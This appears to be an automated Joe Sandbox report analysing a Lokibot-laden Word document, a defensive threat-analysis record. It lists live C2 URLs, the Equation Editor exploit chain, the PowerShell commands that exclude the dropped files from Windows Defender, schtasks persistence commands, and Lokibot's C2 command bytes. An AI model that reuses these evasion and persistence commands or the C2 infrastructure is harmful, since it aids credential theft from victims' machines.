Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SCB REmittance Advice.doc

Overview

General Information

Sample name:SCB REmittance Advice.doc
Analysis ID:1446718
MD5:a19ff7526e4447064c95123087783231
SHA1:28cd27bb7050fb4f5534f584b83ca3be90d64ac8
SHA256:bc6fe96306eb0dcd81bbe50db9e9996b01ca39b22efa79fce253d38532353051
Tags:doc
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 200 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2740 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • sharon38892.exe (PID: 2912 cmdline: "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)
        • powershell.exe (PID: 3128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3204 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • sharon38892.exe (PID: 3376 cmdline: "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)
    • EQNEDT32.EXE (PID: 3904 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3424 cmdline: taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • XxENUzWteJXT.exe (PID: 3472 cmdline: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe MD5: 0B67ADEB422396C047E87FA78A9E8E80)
      • powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • XxENUzWteJXT.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "rocheholding.top/evie3/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
SCB REmittance Advice.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x8f7b:$obj2: \objdata
  • 0x8f91:$obj3: \objupdate
  • 0x8f57:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x174d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 38 entries
            SourceRuleDescriptionAuthorStrings
            21.2.XxENUzWteJXT.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              21.2.XxENUzWteJXT.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                21.2.XxENUzWteJXT.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  21.2.XxENUzWteJXT.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  21.2.XxENUzWteJXT.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 37 entries

                  Exploits

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2740, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2740, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 3128, ProcessName: powershell.exe
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sharon38892.exe, NewProcessName: C:\Users\user\AppData\Roaming\sharon38892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2740, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 2912, ProcessName: sharon38892.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sharon38892.exe, NewProcessName: C:\Users\user\AppData\Roaming\sharon38892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2740, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 2912, ProcessName: sharon38892.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 3128, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", ProcessId: 3204, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", ProcessId: 3204, ProcessName: schtasks.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2740, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 3128, ProcessName: powershell.exe
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 200, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\rj0v3nwa.fbr.ps1

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", ProcessId: 3204, ProcessName: schtasks.exe
                  Timestamp:05/23/24-20:19:03.316993
                  SID:2025381
                  Source Port:49245
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:08.863871
                  SID:2024318
                  Source Port:49251
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:13.398917
                  SID:2021641
                  Source Port:49256
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.005968
                  SID:2024318
                  Source Port:49259
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.005968
                  SID:2024313
                  Source Port:49259
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:35.132025
                  SID:2024317
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:51.806006
                  SID:2825766
                  Source Port:49179
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.079750
                  SID:2024313
                  Source Port:49201
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:55.233506
                  SID:2025381
                  Source Port:49236
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:04.226888
                  SID:2825766
                  Source Port:49246
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:08.863871
                  SID:2024313
                  Source Port:49251
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:06.064261
                  SID:2024318
                  Source Port:49248
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.079750
                  SID:2024318
                  Source Port:49201
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:37.677256
                  SID:2021641
                  Source Port:49217
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:05.135747
                  SID:2025381
                  Source Port:49247
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:06.064261
                  SID:2024313
                  Source Port:49248
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:35.132025
                  SID:2024312
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:22.772748
                  SID:2025381
                  Source Port:49206
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.098368
                  SID:2021641
                  Source Port:49214
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:42.120355
                  SID:2025381
                  Source Port:49169
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:42.915752
                  SID:2021641
                  Source Port:49223
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:54.073092
                  SID:2024313
                  Source Port:49181
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:00.429820
                  SID:2025381
                  Source Port:49242
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.058542
                  SID:2021641
                  Source Port:49177
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:39.381191
                  SID:2825766
                  Source Port:49219
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:45.155201
                  SID:2025381
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:00.736741
                  SID:2825766
                  Source Port:49187
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.049434
                  SID:2825766
                  Source Port:49182
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:25.484710
                  SID:2025381
                  Source Port:49209
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:54.073092
                  SID:2024318
                  Source Port:49181
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:47.441038
                  SID:2024313
                  Source Port:49228
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.210686
                  SID:2024318
                  Source Port:49221
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:50.061779
                  SID:2024313
                  Source Port:49231
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:54.312724
                  SID:2825766
                  Source Port:49235
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.989686
                  SID:2024318
                  Source Port:49194
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:28.376454
                  SID:2024313
                  Source Port:49212
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:28.376454
                  SID:2024318
                  Source Port:49212
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:57.792134
                  SID:2024313
                  Source Port:49239
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.989686
                  SID:2024313
                  Source Port:49194
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:03.278750
                  SID:2825766
                  Source Port:49190
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:44.730541
                  SID:2025381
                  Source Port:49225
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:40.275029
                  SID:2021641
                  Source Port:49220
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:02.183841
                  SID:2025381
                  Source Port:49244
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.210686
                  SID:2024313
                  Source Port:49221
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:50.061779
                  SID:2024318
                  Source Port:49231
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:11.675767
                  SID:2825766
                  Source Port:49254
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:52.694696
                  SID:2825766
                  Source Port:49180
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.888746
                  SID:2025381
                  Source Port:49250
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
